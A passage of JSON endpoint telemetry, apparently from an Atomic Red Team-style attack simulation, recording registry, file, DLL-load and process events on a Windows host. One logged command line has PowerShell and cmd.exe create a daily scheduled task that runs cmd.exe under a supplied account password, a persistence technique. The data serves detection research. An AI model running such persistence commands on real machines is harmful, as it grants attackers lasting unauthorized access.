"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "taskschd.dll", - "image_path": "C:\\Windows\\System32\\taskschd.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805259984, 
- "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573849650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573849650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573849650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C", - "registry_value": "W32:000000000009053C", - "timestamp": 131883573875900000, - "unique_pid": 
"{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883573875900000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "SVCHOST.EXE-E3F19127.pf", - "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-E3F19127.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573894960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573905270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573905270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - 
"timestamp": 131883573905270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883573905730000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573905730000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573906670000, - "unique_pid": 
"{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573906820000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883573906980000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883573906980000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "SCHTASKS.EXE-2DE769BF.pf", - "file_path": "C:\\Windows\\Prefetch\\SCHTASKS.EXE-2DE769BF.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573907300000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": 
"registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573938540000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573938700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573938700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883573938700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883573968550000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573968550000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Plain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Plain\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_value": "{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\spawn", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\spawn\\Index", - "registry_value": "Index", - "timestamp": 
131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Hash", - "registry_value": "Hash", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Schema", - "registry_value": "Schema", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Date", - "registry_value": "Date", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Author", - "registry_value": "Author", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\URI", - "registry_value": "URI", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Actions", - "registry_value": "Actions", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Triggers", - "registry_value": "Triggers", - "timestamp": 131883573970580000, - "unique_pid": 
"{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "process", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "subtype": "terminate", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "process", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6840, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573970860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "process", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573970890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"SCHTASKS /Create /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \" Atomic \"task /TR C:\\windows\\system32\\cmd.exe /SC daily /ST 20:10\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7172, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 
131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "command_line": "SCHTASKS /Create /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \" Atomic \"task /TR C:\\windows\\system32\\cmd.exe /SC daily /ST 20:10", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2812, - "ppid": 7172, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "subtype": "create", - "timestamp": 131883573971590000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", - "unique_ppid": "{42FC7E13-CC15-5C05-0000-0010AD105701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", 
- "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "schtasks.exe", - "image_path": "C:\\Windows\\System32\\schtasks.exe", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - 
"image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": 